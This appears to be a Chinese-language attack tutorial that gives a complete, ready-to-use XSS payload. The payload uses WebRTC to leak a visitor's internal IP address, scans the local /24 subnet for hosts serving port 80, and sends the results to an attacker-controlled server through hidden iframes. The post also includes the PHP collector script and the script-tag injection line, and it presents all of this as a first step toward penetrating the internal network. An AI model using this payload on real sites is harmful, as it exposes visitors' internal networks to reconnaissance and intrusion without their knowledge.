前提得浏览器支持webRTC,测试的时候google浏览器测试成功,火狐浏览器不支持webRTC,
再在xss平台直接复制如下js代码:
function form_ip(ip,port){
var iframe = document.createElement("iframe"); //通过iframe将可访问的内网ip传给服务器。
iframe.setAttribute("src","http://192.168.155.2/rev.php?ip=" + ip + "&port=" + port);//这里是服务器的ip
iframe.setAttribute("style","display:none")
var TagName = document.getElementsByTagName("body")[0];
TagName.appendChild(iframe);
}
function getIPs(callback){
var ip_dups = {};
var RTCPeerConnection = window.RTCPeerConnection
|| window.mozRTCPeerConnection
|| window.webkitRTCPeerConnection;
var mediaConstraints = {
optional: [{RtpDataChannels: true}]
};
var servers = undefined;
if(window.webkitRTCPeerConnection)
servers = {iceServers: []};
var pc = new RTCPeerConnection(servers, mediaConstraints);
pc.onicecandidate = function(ice){
if(ice.candidate){
var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/
var ip_addr = ip_regex.exec(ice.candidate.candidate)[1];
if(ip_dups[ip_addr] === undefined)
callback(ip_addr);
ip_dups[ip_addr] = true;
}
};
pc.createDataChannel("");
pc.createOffer(function(result){
pc.setLocalDescription(result, function(){});
}, function(){});
}//通过weprtc获取内网ip
getIPs(function(ip){
ip = ip.split(".");
ip.pop();
ip = ip.join(".");
for(var i = 1;i<=255;i++){
var script = document.createElement("script");
var ip_url = ip + "." + i + ":80";
script.setAttribute("src","http://" + ip_url);
script.setAttribute("onload","form_ip('" + ip + "." + i + "','80')");//通过遍历,如果内网的ip有80端口服务,执行form_ip函数
var TagName = document.getElementsByTagName("body")[0];
TagName.appendChild(script);
}
});我们可以在有xss注入的地方插入:<script src="http://xss平台的地址"></script>
在谷歌浏览器看控制台信息,已经将内网ip发送给服务器了。
http://192.168.155.2这里是我服务器的ip.
服务器接受的代码是:
<?php
$ip=$_REQUEST['ip'];
$port=$_REQUEST['port'];
$myfile=fopen("ip.txt","a");
fwrite($myfile,$ip.':'.$port.' ');
fclose($myfile);
?>
下面是服务器接受到的ip:
接下来就是可以内网渗透了。